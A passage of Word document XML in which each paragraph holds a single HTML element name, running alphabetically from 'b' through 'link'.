                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>b</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61929389" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>base</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F32D0ED" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>bdi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B85EBFC" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>bdo</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BBB253A" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>blockquote</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="258FCD28" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>body</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18BE3C05" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>br</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5511400A" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>button</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11D2B0A1" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>canvas</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5ACEC0AA" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>caption</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48C23218" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>cite</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D08919E" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>code</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CC73E81" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>col</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72B5A81D" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>colgroup</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DFF44CA" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>data</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04FED4B9" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>datalist</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F3380CB" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>dd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35E0BF71" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>del</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A1D27C6" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>details</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B8B829E" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>dfn</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="521E96E7" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>dialog</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A8FFBE6" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>div</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00BF9A8C" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>dl</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5198A73A" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>dt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68544904" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>em</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="048207CE" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>embed</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B722C27" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>fieldset</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36147E21" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>figure</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B37870A" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>footer</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C445650" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>form</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54B00012" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>h1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EFF978A" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>h2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E6583A4" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>h3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="077803D2" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>h4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22374F94" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>h5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EF4B4C3" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>h6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CC76811" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>head</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18F03C1B" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>header</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="533E88D0" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>hgroup</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21136576" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>hr</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="002827CD" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>html</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F8BA556" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B52A11F" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>iframe</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BFBF210" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>img</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B821472" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>input</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="585741F0" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ins</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26897CF0" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>kbd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="038ADA7C" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>keygen</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00EC6B9E" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>label</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08E93217" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>legend</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75335DD7" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>li</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EA4035E" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>link</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="052211EE" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
